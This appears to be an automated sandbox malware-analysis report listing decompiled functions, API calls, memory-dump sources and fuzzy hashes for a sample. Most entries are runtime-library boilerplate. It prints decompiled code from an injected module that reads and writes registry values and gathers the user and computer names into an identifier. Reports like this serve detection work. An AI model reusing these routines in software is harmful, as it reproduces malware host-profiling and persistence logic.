                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7A28
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7A32
                                                                                                                          • int.LIBCPMT ref: 6E2F7A49
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7A83
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7AA3
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7AB0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          • Opcode ID: b4c8881cb6afe6c378c2839ff9457bb493d4a24f1f21b8533cc5a823274dde1f
                                                                                                                          • Instruction ID: 630204975c4c71ef368b88a043ff29ac7a43fc10d27b993800ab26d871a029b0
                                                                                                                          • Opcode Fuzzy Hash: b4c8881cb6afe6c378c2839ff9457bb493d4a24f1f21b8533cc5a823274dde1f
                                                                                                                          • Instruction Fuzzy Hash: 1D01A17694051EDBCF01DBE4C854AEEB77BAF41314F150809E4116B280EF709A468791
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F1B6C, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F1B73
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F1B7D
                                                                                                                          • int.LIBCPMT ref: 6E2F1B94
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F1BCE
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F1BEE
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F1BFB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          • Opcode ID: e1447d628a4eb73d17e6319073b44a669d2de34783b0a25c0863ef5a86d0842e
                                                                                                                          • Instruction ID: 8e344f7e38f915e660da1f8768f82b0b92cac2bec0441faab920f5361cc4ff88
                                                                                                                          • Opcode Fuzzy Hash: e1447d628a4eb73d17e6319073b44a669d2de34783b0a25c0863ef5a86d0842e
                                                                                                                          • Instruction Fuzzy Hash: 1F01EDBA84051ECBCF01DBE4CA94AEEF77BAF41318F544809D4116B280EF709A878B90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F73BA, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F73C1
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F73CB
                                                                                                                          • int.LIBCPMT ref: 6E2F73E2
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F741C
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F743C
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7449
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          • Opcode ID: addb37c43964ab68725a7bb3832ae5813f147d86176ea749a30871613d4064be
                                                                                                                          • Instruction ID: c0cc93da311738c5d68fd668158cfe851555a51e9e29c7c0960e9e65cc499dab
                                                                                                                          • Opcode Fuzzy Hash: addb37c43964ab68725a7bb3832ae5813f147d86176ea749a30871613d4064be
                                                                                                                          • Instruction Fuzzy Hash: 9601A17A94051EDBCF01DBE4D954AEEF77BAF41318F244809D810AB280DF7099079791
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F7BE0, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7BE7
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7BF1
                                                                                                                          • int.LIBCPMT ref: 6E2F7C08
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7C42
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7C62
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7C6F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          • Opcode ID: ab98b6cc1240006164bda82f8ac6c4376b2044206a49cf1c04ac17979e073796
                                                                                                                          • Instruction ID: c9c818f340387238f3311e6fd71743ebc3b654b9fed98d0776a5aabe622e350a
                                                                                                                          • Opcode Fuzzy Hash: ab98b6cc1240006164bda82f8ac6c4376b2044206a49cf1c04ac17979e073796
                                                                                                                          • Instruction Fuzzy Hash: 24018B7A94051EDBCF05EBE4D954AEEB7BBAF85718F140909D4106B280DF709A068B81
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F7862, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7869
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7873
                                                                                                                          • int.LIBCPMT ref: 6E2F788A
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F78C4
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F78E4
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F78F1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          • Opcode ID: db0d25fe7f09fe62f92182f333e5874fcf8e2aca3005b58c24a567553e3fb56f
                                                                                                                          • Instruction ID: cd11242d226ea7d99949d897262e6479952afbe5c66fc4e4a7b9d44b1b8bef11
                                                                                                                          • Opcode Fuzzy Hash: db0d25fe7f09fe62f92182f333e5874fcf8e2aca3005b58c24a567553e3fb56f
                                                                                                                          • Instruction Fuzzy Hash: F801ED7A94011EDBCF01DBE4D955AEEFB7BBF81718F240809D4106B280DF709942D781
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F798C, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7993
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F799D
                                                                                                                          • int.LIBCPMT ref: 6E2F79B4
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F79EE
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7A0E
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7A1B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 55977855-0
                                                                                                                          • Opcode ID: 537fcd8025759540b7059143b060d742e2170d9e8741950e0e53e992fbf4466a
                                                                                                                          • Instruction ID: e7357c7486df5df563235f74aee41e41d0384e05cc94a078a754c915e5d297f9
                                                                                                                          • Opcode Fuzzy Hash: 537fcd8025759540b7059143b060d742e2170d9e8741950e0e53e992fbf4466a
                                                                                                                          • Instruction Fuzzy Hash: 7801ED7A84051ECBCF01DBE4D954AEEFB7BAF45718F11480AE8116B280DF709A02CB80
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD282B, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 88%
                                                                                                                          			E04CD282B(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x4cdd37c);
					_t91 = 0x80000002;
					L6:
					_t59 = E04CD1922( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E04CD5C6E(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E04CD4AAB(_a8);
						goto L29;
					}
					_t64 =  *0x4cdd2b0; // 0x58b9b38
					_t16 = _t64 + 0xc; // 0x58b9c06
					_t65 = E04CD1922(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d04cdc0
						if(E04CD4A6D(_t97,  *_t33, _t91, _a8,  *0x4cdd374,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x4cdd2e0; // 0xbda5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x4cdea48; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x4cdea43; // 0x55434b48
								_t69 = _t34;
							}
							if(E04CD5F64(_t69,  *0x4cdd374,  *0x4cdd378,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x4cdd2e0; // 0xbda5a8
									_t44 = _t71 + 0x4cde83e; // 0x74666f53
									_t73 = E04CD1922(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d04cdc0
										E04CD5DDA( *_t47, _t91, _a8,  *0x4cdd378, _a24);
										_t49 = _t101 + 0x10; // 0x3d04cdc0
										E04CD5DDA( *_t49, _t91, _t99,  *0x4cdd370, _a16);
										E04CD4AAB(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d04cdc0
									E04CD5DDA( *_t40, _t91, _a8,  *0x4cdd378, _a24);
									_t43 = _t101 + 0x10; // 0x3d04cdc0
									E04CD5DDA( *_t43, _t91, _a8,  *0x4cdd370, _a16);
								}
								if( *_t101 != 0) {
									E04CD4AAB(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d04cdc0
					_t81 = E04CD63F5( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d04cdc0
							E04CD4A6D(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E04CD4AAB(_t100);
						_t98 = _a16;
					}
					E04CD4AAB(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E04CDA938(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x4cdd37c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}























                                                                                                                          0x04cd282b
                                                                                                                          0x04cd2834
                                                                                                                          0x04cd283b
                                                                                                                          0x04cd2840
                                                                                                                          0x04cd28ad
                                                                                                                          0x04cd28b3
                                                                                                                          0x04cd28b8
                                                                                                                          0x04cd28bf
                                                                                                                          0x04cd28c4
                                                                                                                          0x04cd28c9
                                                                                                                          0x04cd2a34
                                                                                                                          0x04cd2a3b
                                                                                                                          0x04cd2a3b
                                                                                                                          0x04cd2a40
                                                                                                                          0x04cd2a42
                                                                                                                          0x04cd2a42
                                                                                                                          0x04cd2a4b
                                                                                                                          0x04cd2a4b
                                                                                                                          0x04cd28cf
                                                                                                                          0x04cd28db
                                                                                                                          0x04cd2a2a
                                                                                                                          0x04cd2a2d
                                                                                                                          0x00000000
                                                                                                                          0x04cd2a2d
                                                                                                                          0x04cd28e1
                                                                                                                          0x04cd28e6
                                                                                                                          0x04cd28e9
                                                                                                                          0x04cd28ee
                                                                                                                          0x04cd28f3
                                                                                                                          0x04cd293c
                                                                                                                          0x04cd293c
                                                                                                                          0x04cd294f
                                                                                                                          0x04cd2959
                                                                                                                          0x04cd295f
                                                                                                                          0x04cd2966
                                                                                                                          0x04cd2970
                                                                                                                          0x04cd2970
                                                                                                                          0x04cd2968
                                                                                                                          0x04cd2968
                                                                                                                          0x04cd2968
                                                                                                                          0x04cd2968
                                                                                                                          0x04cd2992
                                                                                                                          0x04cd299a
                                                                                                                          0x04cd29c8
                                                                                                                          0x04cd29cd
                                                                                                                          0x04cd29d4
                                                                                                                          0x04cd29d9
                                                                                                                          0x04cd29dd
                                                                                                                          0x04cd2a0f
                                                                                                                          0x04cd29df
                                                                                                                          0x04cd29ec
                                                                                                                          0x04cd29ef
                                                                                                                          0x04cd29ff
                                                                                                                          0x04cd2a02
                                                                                                                          0x04cd2a08
                                                                                                                          0x04cd2a08
                                                                                                                          0x04cd299c
                                                                                                                          0x04cd29a9
                                                                                                                          0x04cd29ac
                                                                                                                          0x04cd29be
                                                                                                                          0x04cd29c1
                                                                                                                          0x04cd29c1
                                                                                                                          0x04cd2a19
                                                                                                                          0x04cd2a25
                                                                                                                          0x04cd2a1b
                                                                                                                          0x04cd2a1e
                                                                                                                          0x04cd2a1e
                                                                                                                          0x04cd2a19
                                                                                                                          0x04cd2992
                                                                                                                          0x00000000
                                                                                                                          0x04cd2959
                                                                                                                          0x04cd2902
                                                                                                                          0x04cd2905
                                                                                                                          0x04cd290c
                                                                                                                          0x04cd2912
                                                                                                                          0x04cd2915
                                                                                                                          0x04cd2917
                                                                                                                          0x04cd2923
                                                                                                                          0x04cd2926
                                                                                                                          0x04cd2926
                                                                                                                          0x04cd292c
                                                                                                                          0x04cd2931
                                                                                                                          0x04cd2931
                                                                                                                          0x04cd2937
                                                                                                                          0x00000000
                                                                                                                          0x04cd2937
                                                                                                                          0x04cd2845
                                                                                                                          0x00000000
                                                                                                                          0x04cd286c
                                                                                                                          0x04cd286c
                                                                                                                          0x04cd2878
                                                                                                                          0x04cd288b
                                                                                                                          0x04cd2891
                                                                                                                          0x04cd2899
                                                                                                                          0x00000000
                                                                                                                          0x04cd2899

                                                                                                                          APIs
                                                                                                                          • StrChrA.SHLWAPI(04CD2197,0000005F,00000000,00000000,00000104), ref: 04CD285E
                                                                                                                          • lstrcpy.KERNEL32(?,?), ref: 04CD288B
                                                                                                                            • Part of subcall function 04CD1922: lstrlen.KERNEL32(?,00000000,058B9B38,00000000,04CD74FF,058B9D16,?,?,?,?,?,69B25F44,00000005,04CDD00C), ref: 04CD1929
                                                                                                                            • Part of subcall function 04CD1922: mbstowcs.NTDLL ref: 04CD1952
                                                                                                                            • Part of subcall function 04CD1922: memset.NTDLL ref: 04CD1964
                                                                                                                            • Part of subcall function 04CD5DDA: lstrlenW.KERNEL32(?,?,?,04CD29F4,3D04CDC0,80000002,04CD2197,04CD258B,74666F53,4D4C4B48,04CD258B,?,3D04CDC0,80000002,04CD2197,?), ref: 04CD5DFF
                                                                                                                            • Part of subcall function 04CD4AAB: RtlFreeHeap.NTDLL(00000000,00000000,04CD5012,00000000,?,?,00000000), ref: 04CD4AB7
                                                                                                                          • lstrcpy.KERNEL32(?,00000000), ref: 04CD28AD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                                                                                          • String ID: ($\
                                                                                                                          • API String ID: 3924217599-1512714803
                                                                                                                          • Opcode ID: 409f53618e0ec973693aad376701888c27acc0c018d682ec219e441a9d866042
                                                                                                                          • Instruction ID: f4bab0747392ef14c8ba08aecf9729d254857f9b287582985147c61ebe4c7ac6
                                                                                                                          • Opcode Fuzzy Hash: 409f53618e0ec973693aad376701888c27acc0c018d682ec219e441a9d866042
                                                                                                                          • Instruction Fuzzy Hash: 95515E7550060ABFEF22AFA0DD44EAA3BBBFF04314F048565FB1A96160D735EA15EB10
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2E72B0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • task.LIBCPMTD ref: 6E2E7352
                                                                                                                            • Part of subcall function 6E2EF8E0: task.LIBCPMTD ref: 6E2EF95F
                                                                                                                            • Part of subcall function 6E2EF8E0: task.LIBCPMTD ref: 6E2EF96B
                                                                                                                            • Part of subcall function 6E2EF8E0: Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E2EF980
                                                                                                                            • Part of subcall function 6E2EF8E0: task.LIBCPMTD ref: 6E2EF998
                                                                                                                            • Part of subcall function 6E30E156: RaiseException.KERNEL32(E06D7363,00000001,00000003,6E30AF34,?,?,?,6E30AF34,?,6E376BD4), ref: 6E30E1B6
                                                                                                                          • task.LIBCPMTD ref: 6E2E73D2
                                                                                                                          • task.LIBCPMTD ref: 6E2E73E1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_errorExceptionRaise
                                                                                                                          • String ID: =Y.nDq6n$Dq6n
                                                                                                                          • API String ID: 2403370058-3119292408
                                                                                                                          • Opcode ID: 8732f0ee543e46bd86a60d1bb9fc9a52e1c99f85b75c58516a334cdc17230d04
                                                                                                                          • Instruction ID: 14f4071c195ca4dd88ce738d9ab30d4a443aac308d4044bc8a804487ae99cf0e
                                                                                                                          • Opcode Fuzzy Hash: 8732f0ee543e46bd86a60d1bb9fc9a52e1c99f85b75c58516a334cdc17230d04
                                                                                                                          • Instruction Fuzzy Hash: 0F412875D0021DDFDB14CFE4C890AEEFBBABF44314F508669D415AB685EB706A05CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2FE031, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Mpunct$GetvalsH_prolog3
                                                                                                                          • String ID: $+xv
                                                                                                                          • API String ID: 2204710431-1686923651
                                                                                                                          • Opcode ID: 8b1d875aaf92dd5ce9a44f6825daa27c7f1bf03cc981819b9a3175fb5841eca0
                                                                                                                          • Instruction ID: 1941ddf2010f389db1c7c865bf804e96ef270fd76d89386dd51ab88276269758
                                                                                                                          • Opcode Fuzzy Hash: 8b1d875aaf92dd5ce9a44f6825daa27c7f1bf03cc981819b9a3175fb5841eca0
                                                                                                                          • Instruction Fuzzy Hash: DB2195B1944A56AFD722CFB4C45077BBEFDAB08614F04491EE499C7A41E774D602CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E32FF15, Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$InformationTimeZone
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 597776487-0
                                                                                                                          • Opcode ID: dbd61e87d20627212246f2fe25e9d7cdd6990940e95cd3b1c55e0d7751fb18eb
                                                                                                                          • Instruction ID: 2d1502a18f084dc6ed38b25d9cc42c41200cd3cfda5e2ef50d5068226a2d90f6
                                                                                                                          • Opcode Fuzzy Hash: dbd61e87d20627212246f2fe25e9d7cdd6990940e95cd3b1c55e0d7751fb18eb
                                                                                                                          • Instruction Fuzzy Hash: 57C117719042A5AFDB109FF8D850FEA7BBDAF46358F3445A9D4D0E7281E7328A42CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E332B27, Relevance: 7.7, APIs: 5, Instructions: 186COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3033488037-0
                                                                                                                          • Opcode ID: 24b1ad0a7ac5010be7d759dd65c040dcdd0af27c881ce837d7d438505233c50f
                                                                                                                          • Instruction ID: 1fbfe1097f31ab092647670b083c3619b0f3f54f6c6aa2f80df11c6f284f7c3f
                                                                                                                          • Opcode Fuzzy Hash: 24b1ad0a7ac5010be7d759dd65c040dcdd0af27c881ce837d7d438505233c50f
                                                                                                                          • Instruction Fuzzy Hash: 8751D532A00655AFDB10DFA9DE80FAA77F8FF48724F644969E845DB250E732D901CB80
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 04CD137A, Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E04CD137A() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E04CD75F6(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E04CD4AAB(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x4cd4565
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                                                                                                          0x04cd1388
                                                                                                                          0x04cd138b
                                                                                                                          0x04cd138e
                                                                                                                          0x04cd1394
                                                                                                                          0x04cd1399
                                                                                                                          0x04cd139f
                                                                                                                          0x04cd13a7
                                                                                                                          0x04cd13aa
                                                                                                                          0x04cd13b0
                                                                                                                          0x04cd13b5
                                                                                                                          0x04cd13c2
                                                                                                                          0x04cd13cf
                                                                                                                          0x04cd13d3
                                                                                                                          0x04cd13d5
                                                                                                                          0x04cd13d9
                                                                                                                          0x04cd13dc
                                                                                                                          0x04cd13ec
                                                                                                                          0x04cd143f
                                                                                                                          0x04cd1440
                                                                                                                          0x04cd13ee
                                                                                                                          0x04cd13f3
                                                                                                                          0x04cd13f4
                                                                                                                          0x04cd13f9
                                                                                                                          0x04cd13fc
                                                                                                                          0x04cd140f
                                                                                                                          0x00000000
                                                                                                                          0x04cd1411
                                                                                                                          0x04cd1414
                                                                                                                          0x04cd1419
                                                                                                                          0x04cd1427
                                                                                                                          0x04cd142a
                                                                                                                          0x04cd1430
                                                                                                                          0x04cd1435
                                                                                                                          0x00000000
                                                                                                                          0x04cd1437
                                                                                                                          0x04cd1437
                                                                                                                          0x04cd143a
                                                                                                                          0x04cd143a
                                                                                                                          0x04cd1435
                                                                                                                          0x04cd140f
                                                                                                                          0x04cd1445
                                                                                                                          0x04cd1446
                                                                                                                          0x04cd13b5
                                                                                                                          0x04cd144c

                                                                                                                          APIs
                                                                                                                          • GetUserNameW.ADVAPI32(00000000,04CD4563), ref: 04CD138E
                                                                                                                          • GetComputerNameW.KERNEL32(00000000,04CD4563), ref: 04CD13AA
                                                                                                                            • Part of subcall function 04CD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,04CD4F70), ref: 04CD7602
                                                                                                                          • GetUserNameW.ADVAPI32(00000000,04CD4563), ref: 04CD13E4
                                                                                                                          • GetComputerNameW.KERNEL32(04CD4563,?), ref: 04CD1407
                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04CD4563,00000000,04CD4565,00000000,00000000,?,?,04CD4563), ref: 04CD142A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
